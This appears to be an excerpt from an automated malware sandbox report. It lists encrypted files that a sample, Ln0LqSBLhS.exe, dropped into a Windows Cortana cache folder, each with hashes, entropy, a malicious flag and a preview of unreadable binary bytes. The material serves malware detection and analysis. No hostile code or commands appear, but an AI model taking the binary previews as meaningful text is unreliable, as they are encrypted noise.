                                                                                                                                                                                                    Preview: 3.!r.\.)..$...#.`.W.g....(.%_j.-..z.3.....']....\.c.i~..\..O.Y..^.4..Q.3.D.N....V.....@f..(".m?b5.(gQ..t]U.iS.C...0....V.r..A.....#.qE. ..6....m~.).....O.u;:.=.I...eU....|.-i...z!S6..Ph...G..o.Jk.8J%.&|..V..M.D.Z.!h.e..e..Z..A.j........n..@t.T&s..`.'.JDz...7.FD.#u....DO.....u.X....-.ga<B....=o.....W......=s..d.)b..{XO...\1AM}..z..>...e!r.E..C..F.0.MY...f..s.`x..{.S....f...,2..].B...t... U.x......B....b.E_.Kc...!.D.%............t.O+]....L.....C..Ob,9.s.."......,O.)w..7...d.....i.We.W...y..............X%.P...G3.d"H...........S.s....I\.Q..@....VMZZc..F..w%...[.......p0.x..].z,...].....5.N;.\..4.=O....|d*v..X...A\E..CC.'.A....P:"'............S.c.6..B..L....1g.>0.f_..>>..N...+B..+|.Lh.9V.dx....G4.....z..F....d..JN./|..-.l.`_;.....L..e .....K.@...#.D..31..g....G#2Z...W...|..6xN.|. ..,.v.X..7U.sL%....^[.u.5/.q...r......)..q..r.Z...zKX...;d].....4k....|..7Y`$w..sF...Q}.$..o&J..yxDBZ...n........iKHw.G.hQ.G~...."...L. 8[....Qyuv:*.k..A.W.q.n7....Y.ZfH.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):122086
                                                                                                                                                                                                    Entropy (8bit):7.998449046944833
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:g2FykQXNCRqicfIezmhsrIToWHcC2hC3KT5+1QM1Wyaqa7fSr66:g24JCwiazL8ogcCzaTY1QM1WyUfU
                                                                                                                                                                                                    MD5:CF19296BCB1EE7D9128A6A6333C405B0
                                                                                                                                                                                                    SHA1:9F1AB5280833572B1C8866E086E41EA66D0C7E09
                                                                                                                                                                                                    SHA-256:C94E071E1AC896239E83A2CE788D4E9BA83E4E5B1AD64862E0E206A1FF34B565
                                                                                                                                                                                                    SHA-512:06805FA11F9359732BAF9E4F7F42078E90E27B58BC66C4B087999CF765207D3660B4F378D4434F464321E031DAE3E8B543C39F4C767A09E6D0E1F654BEF7D4DD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..U..w....;.5.c..>.9R......L.......pb........5b.)..&.r8Pvr..e..Km%..-O...u....b... PO6..J.o..^...>....j....R..y.`.0...2...F...N0...I...#...u$HR..B.o|.v..X...k.K?....U\%..>2.S..+[6A.!i.w3CC\x......[.q..b..........TH..].r.m..Y. ._ .c.G.t.T..n.m.Rp...od1..A.R:...*..P.T.n....:.a..c..q1X..-#H0P.;K....n^.2a.7...W.YI.\N.~U.H...7..G..,sy..F.8.e.4..n:...R.&E.!..b..k.p.@.....M......|i.'b>1.x7./..4.pL.>^12.nG..K.......P..v..Z...._.....aw@"..@...e...,{#)R.)Jg.H..J{..o...O.5s.&#.n.M...E.R.......<Q)......}.....d...r..."I..(..Em...P...n..1<.2....8.,..F.`..?..%......:...J&%..db.:....&=....7"..W/ZNi.H..63..Z4....V[.l.q.De;;"...e^z$..*..v.`..v1A..h...~&.(P...X.H....;v....?....:k.P#....N.BqO>i...p.a..m.............r.a;.{....'8#.f'.|.s.sP.Xm...*.i..0...e.b.)..d.2../U_...p.O......3O....I.FL.;....:Wh5D..yV..p..3DW#.d...RX.Ie.j.....V...e?W6.>...^...3[....z:.k..2.{t...gg%..?..8.Gy..|W.t..W_IC..y.z....G...4....<c@....V..Hx&;/.....yd?...TL...R.y...........
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):53542
                                                                                                                                                                                                    Entropy (8bit):7.996992461370104
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:mH/4/eTW/DMY81gsgUIO2o8dNUq8GSH1dg2bdVfHowRGiKf:mfWiWbBv1OMjC1TgAdVfH5RGX
                                                                                                                                                                                                    MD5:760A9756A7EA4C32855D0C1ED891B9EE
                                                                                                                                                                                                    SHA1:A9A93A49A5271F0E365F03EB1E28D0113A84404B
                                                                                                                                                                                                    SHA-256:C5317E08C724C92C50E2C7AD517F710417F17DAD3638727490A264DC0CBDBD50
                                                                                                                                                                                                    SHA-512:CE4AD1C8EE707E120B93DEE7CB62B65815EA880478F43E27C0D64027989E313D03FA5F39FF7F7F23B411E9475C063D6ACFB5179805759316C743C2DB755E6DA9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..]...>4%..,..Ab......I..K.`{./;..*h.dX.....z.j)...3...V4...4xd........... .......q.....V......&...*..L~tk#.8[0....3...E....M..`.!;..u.Y/R`.$....HD.W..l.${%..D..XVV.<Ak?..P........{.....Co... ...'.u....8R`.K~z...[....9.V....3C..81..L.z1K.y..q......1?..I.2.........EC.....a5)N..;0...k.8.K.I......X..p..K&..U.....jS.T..Ho.\Q...P...M..f...p..V}tckn..{.Wa3.2i.. ...F........&:..p.M\.U.leh.<I.7r..(&.....5.4.Yw......@.IMy..='G4..zr&..v!S.OVM.5.X[uY.L..w.t.=...{..F0..A(.u...iOH.e.5.G........+........m;..._..R...{Two..5.y*..wY[ 5lk;>....R.9..........=.....[.B.I.....^..p..e..K.T0x...cI..rt@.A.+.U.}H%~.<.Z.".{n...g.X..0fO....8.".kWG..H........P.....u.....g.o}}.....$..2.6.Y9.Nhd..z....Y~.).Tx.g.Q[..........v(..P...Y..4:..N.\YB......D3...E.|.u.P.......!.sp.m.@.>.V{./.d..O..B...4CP......^.w.>.....v.18i*........!.(.'p.....$...[.............$.....U..Pv[...w.s.>p..s.*=^....c.\..k...6l..ns.:..Z..[.%4.....7..:....FWl+B.....:}0...v..=c..`.s.I$...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99872358941702
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:VncTsER0P5Fb2KqH8gUYukuAeRvw11bocDIfzBY6Ao6tIO:xcSKGYdq+b0fzBYRFtIO
                                                                                                                                                                                                    MD5:967DE5050B9B81A1AA5B3F75AF4FAE8F
                                                                                                                                                                                                    SHA1:260A7C41F74A3F39007B303909EB346D3FAD296F
                                                                                                                                                                                                    SHA-256:1096BFF0A6C37495BCDB93C3852B5C16CFC765445711007BD49AD82351D54E99
                                                                                                                                                                                                    SHA-512:08711A13E116B8DC30AE5939994F5021553B5EF3792D8AB6EF95D97D59DF89FE6AC215356B408F2D86F3D4F30443153CF8170CCF87EC715D28755E06063F55A8
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: $;.kx.T..h.{..zI.\T..BX.y....# .uYBVb....S.....6rmIS.vo.D...<.'j....+.a....E*..{......Z....{@39...'.}...-..vN.$.*......p.f.xF1..Q.N.......F.`.;&hh....?9_.V.dH.....1..#./...|........#....(|?.t...[o....C..Vr..w..N..{.`.......z.....r./...m.... .T6.&.h~.I..}p%:.).1.R...k.a6.....@o......M.=..&.7....}.4..uC]...6.....LDmh...5..wG3W...2...^..w.*p/.~a.}.H..E.....&..\..@..N}*.%..-*Z....%2<<....y.i.P..r.&.d.mr.i....+9....@Ie.{..x.@#.v...E..."..._C"XKp.b2e^.\.{S4a.t..S.v...J..`..U.Z..z.r55..a..WXL._........h..#X...`{...U.r.....b...Jv.v*..6...c ..vW.t5=.-t...0.9Q....,..o.@.@#......pt.%.ok.6.q@..>.)...3x.;...\..S.6.....d..o.v?.G....8....CE\.j..'S.9.......=.....G...x...u......{..M/..%....X.F8....be}4......fT....=...i\.%R.........g..}.......f..........[%+.~R....*a.X.P.G.. ..b..!2.0>......>..g.>y.`?.;.K...b*.\.....5...*..*B|.......28-..[>..c.a.$8.t..Ue..0.k.,.!...a......|.<..Z5..*[....O.&0..F.?.Mb...2..........A.?R...3A.9../..Ps.",N.......E.tW.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):100858
                                                                                                                                                                                                    Entropy (8bit):7.998308245520676
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:HuVSY5M3Wo1GX8drN162NFCwhdLN+7w/zIxm9vB8q63bfEm39282gD9JO1v6:ObM3WngR7FlcsSmRKq8TE692p49JQv6
                                                                                                                                                                                                    MD5:CE5DF79C510FECA564EA550728AFDCA2
                                                                                                                                                                                                    SHA1:2807B4BE06CCED5FCDCF640D452BFCDA4AE1402E
                                                                                                                                                                                                    SHA-256:E602AFCBACD4C6941EA18355FB7F752D60E0C4B358B0E90044D4359C8E0E56C9
                                                                                                                                                                                                    SHA-512:315B78608C2195FB6E61C6437993C2B0A238E100EF85C1C00D4F4FA38E092C1E860215E23B1E44FEEF0E5846D8700BDDEF1E63955C0B3B5E0BB9A268E57007EF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....M0.[.0;X.......#d..-E..B...%.bk.Oc.mB..x..F(F(.Gd.5...:f..[ghk6...x..a..2.T.......dH.............IJ.....[......B.W.ZN.!Co4..=..(..'.`w.@..G...c....9.._.l.`..A.44.B.Y...k. ......g..|I.J.r....Q.Dg...V.........O.0.A.#E.....X..II&sq._^..U.....L5G!....a..%b'.......|....(T254*0 kf.!.]...O%d.!si..5q.wl.<.:.....MW.=..l..JnA.v.T\Y.fA..P.-.|#_K....?K.rGa.Z.#....2gD1+....a.B~...v......H..y,.'......D.U|.....@3......&.\.......Z?...9=u'..." ....M2.M.\.s...H.....K2#.....!..d`.^...O^..-4D.. .....m.i...o..#}...sg.=.../C8.).p.)....h.z.......GX........w....Rp..&....d8.a`..W....]f...N...}|.w|..P.....p.f.J.cH!...d&.c.:.I..;....O.....hc.$......%.{..DD.....q.k...b..Q...,...)....LP)b.*...6..?....'1.0.I/>...0.lz,....i..Z...qb.S..........D....Y.#.....5...D...O...9>..."../?..|.7`..a'n ...?.......$.H7{z8.6%.~...X....c.d.koa.X6.H...........*C.Y...:L...l.......d.....Q.?.J...ge-G..|q.v.(..............O..pXSx:5.;).!..Z.....%.V8..E.5_`....m...(._...OT.y8[};.&1.m..@
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):24613
                                                                                                                                                                                                    Entropy (8bit):7.993455196889529
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:oCZOoZK55ZWLqElqzaNaqi5CcbywTWYNnUEssbLlvyXei2MDldg8aySQYIcL94z5:oCz+50u9qECWy2uALlvyG6l7dhvRu877
                                                                                                                                                                                                    MD5:AC735BB47124394B9B374BEC606BB80F
                                                                                                                                                                                                    SHA1:4419A42F9442F4BB691EF989353123BBF28D30D2
                                                                                                                                                                                                    SHA-256:77F949B21FE528414C7019BF2858C25BCAA56788B82F2A1C7E8908DD5F52664E
                                                                                                                                                                                                    SHA-512:C5F5B06F3BCF27417CE2D83ABF9615EE2E7C4D8B2263EAC0E99D8BB6ECAF557B79DFBEDE9BD9ECFD391B30F55944E5A1465FBC2DA3280CE53385467E069E9427
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..X....3..fT.z.@..i...@c.Y..1.LH.u!a*9H6W..N8N.xQ;.A?..CH....3..$<>o..u...#pZ].$...k..O.\.CYn.8.+I.}7.GO~jh...j.R.8.KRY. ....B...ae......h..".s.K.4.~m..@e[.=X..c.."4..B~..N1z....D?..q..`.... ....Dh-.d....:o`\.5..3b..._2....9Fv..7........M.^...mZ.a....t...g..#'.........g...."fX.......Y...o...QL....Ga'...5[f;.|...}.p.00~..~.R)......^N...}...Vi..7An.Co,.cA..6.TY..4........W...N...q..#..L.~.7Jwi.W.6.N..... j....C.z>.[@..1..`.|R..*[...Z9.3o.h.=!.L.b.@.7......D1.#..c.:.(.r...)...@....h......mG!.}..-[.+.K...7:Z.dX/..L].&vY.IU.......z..mR......+.. 4.o^.h..M!.!....%6.q9....)I.<..%......CL1O.{..:H......c{.ap..D....ySn.rV..w...Rnq.|). .D.k..G.m...m...Sw<."i`h...$:..U.Q....P=Rz!L..%...;u...:m....%. [.......y..`..'.......!._#./..e..........].OL.....\.=..O.8_?3....JK..].I...b.......}yY..........<.....J....r..U.|..uSg...b..N./.Y=..?.>......J...W..........L..]....;......}...o...<.-.....U..._#.....7..c...b.JB%..`.\..|...\!..aV.(+o).f....{./.[.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):132932
                                                                                                                                                                                                    Entropy (8bit):7.998684748655158
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:qe0DrEbRuiRv3Tn5SBH3HMkUlGeg+tzxcA1ay2R+:F0QXsBH3HElVtPv7
                                                                                                                                                                                                    MD5:242BC01B405018E126317EB60198827A
                                                                                                                                                                                                    SHA1:8B52EDE669C1578F205E6E0EACE5C7703AEF6906
                                                                                                                                                                                                    SHA-256:4AA74A7676A66CB49A17CF2FEE926631A98EFAF28423DD7B221562F88F6F6233
                                                                                                                                                                                                    SHA-512:FF1EB8D2B01970DDFAD1C5B1EEAAB1E1B9C5B44207248CA8B10817552868EE9437420184325028F5505C9AF55B08DB3A54AFF59AEED89E85B8CAFE9A57DAFD0C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 3.....A.`...........Zs4..z..{....s.&.-..[.....~..........Tx..S...Z.a.6.g.LK..6?}[$x..S..?.....Z..)..nm.../._.~p.=...Lk<Mz..\.p.u.... ...2........KoF.g..F..if.:...!O........a....~.. .1!.4.\PhB?..x.7.:...#y:....K`:.MyEk9..&.....{..].....E=e...hn..+>!.....c_.iMa..re..G...Y;W.y5$o........' =..8~.,lT....m=*.q9...^.[.W.s.l~...&.e.t.s.IJ.[..v.&.......!.6.%V..W.?w..*....(.{$V$Y.%..yhY.i_.4L!2ANy.d.q.jp.bK.e.6IvH.y...dA.g[..........<1..z.N.9..{.}E.A...!..@.#.......Gs.lO....g..|.-.I.K.2..P./...#.-N..:.q..K..;]y.2......n..%(..F...8...>{s.+hF#3.....aq0....5...y;Ag.'..FaV....|S.......@.P.......c........8{Z..P.mZ.....O.2..7.+.\.......k.....x.......Xz.L........d....T)..v5..l.MCh.M...g.n.8..q.&..F/..}....O.d.)...K%.=.._".\-....14.p...u.s..TycsZ.n6.U.$G>.S5;..RQ._g"...j.;<l.R+!{.....,..c.....q.....w..u3..#....i.p>.-..4Cs.e.+f)..F..O..RC..'..o!...q........}h.....:..K..4.z.~T.. Q8..m........K..I9..x..=&E...@...{.....3'./.m.|.){.Mp...9\.........A.N<......q
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):41538
                                                                                                                                                                                                    Entropy (8bit):7.996067638442256
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:ELBPUykajVlEXTks3NxynXYqYSvdLw8d/4RkRIvbIzeObof/B2+ad5:5yPVG4s3aokhd/t28zrboh2bd5
                                                                                                                                                                                                    MD5:2C80C9B0E8A2B01FEFD0A3E46ED74BE2
                                                                                                                                                                                                    SHA1:BD355C888D4C02345F95F82C35C61861ECC9CA68
                                                                                                                                                                                                    SHA-256:29B3CA566F331965568AA4668595F9AE7A7886C8DAB408CB9E56FC19AF83A370
                                                                                                                                                                                                    SHA-512:37449ED4E80967A343645A5E7D69B95965F9C164F3BB933A25E4734C5824D34FFDBA0B57193912C7A85245BFB679E9E5440AAB8291E6873FD6D33F284750A48B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /..cRYpW..........!.J.'....kCn...+..W.%.'.=..J^.p..b..e..6t.dA.4"..r.b..\..0.\f. .S...)..-.....3.i......;_.>s.....].*l....I...TW..3.3..h|R#g..wsR./...(......9q6.).D}.-...U........O.i1.ga..aT=.5T;V,l..n.s.."l.l../Q....0E.X...-n...WW....y&r.9..Qy.f.}x...=....#'....oAqE.9..X..:...6H....n`.n=...?.....}........4..W...cs.y......z@..z-:....F.HFw.ZV.n.F..[..".mpw...C..,..MV.-H..H.......0h.....J.~..S............)).x...+../.my.T.4.6.E......&P5.V.Bk..!,...)_..iL$<Q.K.....n6.Qc..K.P....>. .!.a...r......].PAg..cF..+...0.3R.JTy....J..z.....4}.w......pn...................Ha'......b..?.....n..o...E.$.gV9&...Q.C........+.6.C.^9..3...v....~.(X;....}.5=..Gh.i.mk7..:;..lW.R....4.>.....d.P.A...,.P.....F..V.(`.5.L.Q....U....,......:.....h....v.... u\.6.....Bh..(n....]...q..9..5o.c .......!.....\.$.....f.u...i.Kd.b.G.....R...r.4i.....P.....T..S...z..:.....`].v7:.......*}S..&.....:.&.....y|.Lo5=.D..a.I.0....6..W[..#...R.I..S..>..ks....KL).N..t.Q<..."..N..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998689551162491
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:TtciI7LeindvXCF9Z4+pMyQjLVIhf1I5DXNDZubXhXVNXn/sizxE:hciIXeinh8DpHQjGhOebXJ/nRxE
                                                                                                                                                                                                    MD5:5188E3DC5C4B27DA7D2392CCE85D2820
                                                                                                                                                                                                    SHA1:98067E9B9032FA231A38F5F5A5435D7473B2C6F5
                                                                                                                                                                                                    SHA-256:7036E14A10D044E6D2607F4117ECF8F97FBC539115A40BB2F4A95D46711A8427
                                                                                                                                                                                                    SHA-512:59EA078508698404D385CEE3E5ABEC62BE42ED548CEA75AD2F26FC2C98C993C4C4386A7AEB18BEB184ADD6F9F8C1CEB72EB93BDDA73E960BAA3DE27CB000AFCD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .?k.........YD......f..R-y7k......<.Z.*]tQ...^.?..Pp....j.....].........vf...=.L..i.4G..Nt..k.JT+.[......U.A.W..d....o.K.@.=]'j.Y..........-;;..h.|Ch8....I.T.FFt.I,......?Q.+..~))..'.......*6...^{...D.......7..f..1.Z.8..p@.6..OZ.q......,\...s.<!..I.}G..~.c.c...pI.....*..{.h..~9.a..>L..../...T..$.h.LU.../UF.Mp`"X....C._}..J..tc.U.....K=.......\92x.....9D.y..)...S..\K....B.z...5.V.^.o.A.@..,."...,z.Z0.2 ...~.g../..........]...x..yp.hp+..ac.a..L,..J$..........m.BJ.p..&...7..W......Rm..s....-y...x2y..[......sdt7.....g..T.7BF.[.....~.`..k}!%......rz.k@.H....X....q"q....B.R.e.I.C..$...^.F`.".}...N.g_....4..>.....6).....X.....~G..z5.<.1.g7...r.....ut.....c.a96B..Ri.j....@.Osa...I.pQ...!q....1..M...M..LeFA..6..L.J{.........f..)..Xr....y~X..M.>.V\..:.......\....!.T.Jj0.xu..........]9h.;5...b....]1P..p.huz?l..F.p.........&.S^'.[..V.ue.~....Bh..1.9.K.@.....nhE3>.x.b..#..{.T...<.-2.yUlr.LEr.\i...m,......].....u....".=.F'..};+.C......Q.}{...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998718907996627
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:zcgI2BGCY4na+ZhEHBtfv7bvMpgJARwl10HP9DNAAP41LODVjzTS:VIKGPMzZhEh9vfvMwl1M1LPKLORjy
                                                                                                                                                                                                    MD5:99FC17BEF7D04DA6A218BE4589DF0FEF
                                                                                                                                                                                                    SHA1:045BDE292B00528FDC08E33AB9C7869D4FB901FD
                                                                                                                                                                                                    SHA-256:E39B0FDBDBD92D835F9BBBC7FD82CB002B7BA1772D7442354983D1DE8C6B7F11
                                                                                                                                                                                                    SHA-512:DD52A468AA760AB325F95BE2B075C28EF561637E7200F144596DD6F9E4134BA133B3568EC16CD216E6FA66A5ADF8C478884201C95253AA093513848A932D2949
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..Q...O..4.......P.`....Q.%UI...{.Q.J..q....2O.Ss.I....uW...k.l...H..M.Z].......\u.J..&....Y.z......Ex..'..#.8..j...x|..<.Z:.6..YD....Z.g....Qt..I...Y...^".FH...U.f.<_.1......w.'.9.M....o~.B...y.5......n..>..*....:>.C......GZ..._..iv.3.kaD.....D.....&.{Y.m.4...Q....d.v;.bl......J.z6.u..S...J..s......2..P.&.m....I.]p.>v....6.t{.PJ...n'........:....\...2...e......7 .{...cq....5...[i...bH1...P.g\....^[....y<...nE..x..d1.3.X...5.$.. ./4-fB....d#.9.%-.=.`.W.%...Wr.?1.....~.VV3.B...f.y.0.e.......!3.Z&XW....I6c.53....O..~J..E.)BC5..7..f?L`K.s....]...|..E.q..mi..(J..).N.].%3'A.7.&....](.~......]n...E.).n..!F....[/2X..<`.*.h.~VJJ.B....y.t.yU....G.(.W9.:..qw8.w...E........;3......s........ns..j..2.._.)...4............. .0t.q.*.?.l^..6....#/h...H....md.c.;...=]....3..?Q..e-..*9.t....[+>..P.dl9-.\.r>..y...$...S.8........3,O.."NV...~.r...nb.G....v4.##Q.h.z.._...0Q..Q.J....#|.{....N.}.X.J..72A....f.E..KQ..K.'..C.z.g.(.....ss..*9.V..r..5...x|3
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):31462
                                                                                                                                                                                                    Entropy (8bit):7.993682336141503
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:lQvmFPVaeh5lK80j2dNHspNEhTxi+anZl5AWvAH5X:9nBC84Os0h0+aZDAWoR
                                                                                                                                                                                                    MD5:406B8BE8D572C56FE9B091434C1C01D2
                                                                                                                                                                                                    SHA1:A058EE96A16855C50E3D71A919550CE3FF16EE1D
                                                                                                                                                                                                    SHA-256:7BFAB3AD6E419FD1DF465C0D4ECB1FED2E08920D5EA8D81B90EACC338FD6DDB4
                                                                                                                                                                                                    SHA-512:AB03A96627EA8677D469CBD1E61A988F7C467C95131A779E1B3793DE3FC5F5F095BE686AE896B46A1D8CC645DCB6D45D12A4759B04DFB19F9C138A21223A9CC4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .......ks.!s..........A....e.........\..^.55.B.lg..!/.:T..fd.(..P..H..s...6.1y.L....=3...../>"...z>W.[j...^.?.e!. .Wp`...ar..Q..*X.f.<....J.b..}Il].w.O.L.hV...s..h..!..a.m...;'VX..h."9/.@....-@:.'.b.....w.........q..Jg:.f4..A..l.e.D1U...Id7.y6.]N."... .2).9Z.9T.PVD...d#.(.tES...h..>L...v.j...gk.+..:...Sn..N.U...3..=.@g.>.@D....)H. ..p....n.y.MH..#.[.!.....=C......f.. ......%.O..|..../.X.x.....U:isr6..h.$q&ZA4@.........../...)....XP.^.4....y...;...>...........~..l.3..hT.....5.`D......s.0..)_....N..<.h~....k@..G....}ZK.%.L......~%...0.:..c.X...u...s..{..c*t...g\`......ts -.6[\...^.(..*.:...A................w..c... pE.N:x .u.....Dbj..u...Cr....|. .${|...^..Kb'....#.`...iW..+{...5.....LvV.x.c.b.....t.e].`,....rcs....y..P...B[.P.[.&U&.!...SmJ....7R{t..B.Y..H.1.%K.-#.9...+2.;.q..0_.>..QkCB.~.,v..G.:&..I...^...6.fbe..f.t=...M~T..G3d..4<V..+-*..K. ........K|...Ri@...."^.J..\hq..A._....Mp.....I..uyA..g.:..lI..Ea.f...yH....G@*k...P...).%.........
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):56610
                                                                                                                                                                                                    Entropy (8bit):7.99683631040437
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:jrds6AEA5QZehGQ/G9+LI8SOX+k3cGTWNlqqWoMG1Yr:jzATCZehFvo8+k3PorzMVr
                                                                                                                                                                                                    MD5:5E00FCC10D94C2FF742CBA050C3216D7
                                                                                                                                                                                                    SHA1:AD43D6F8F2EA0958AC8E95EAEB4FA8FF86EF2284
                                                                                                                                                                                                    SHA-256:75F9E5F821EEDDAB0FCC8C981C9FCEF1E97D471E135833666495901C3328C97A
                                                                                                                                                                                                    SHA-512:E47F485B7F8A5AD37423A40FC451D00AF30A69BEE7BA3FA35C017A061048ECAAA623D4CB6677E6ED78784249E7D7EE1326B5CDCB0C1F9567C51511799A7BC53A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
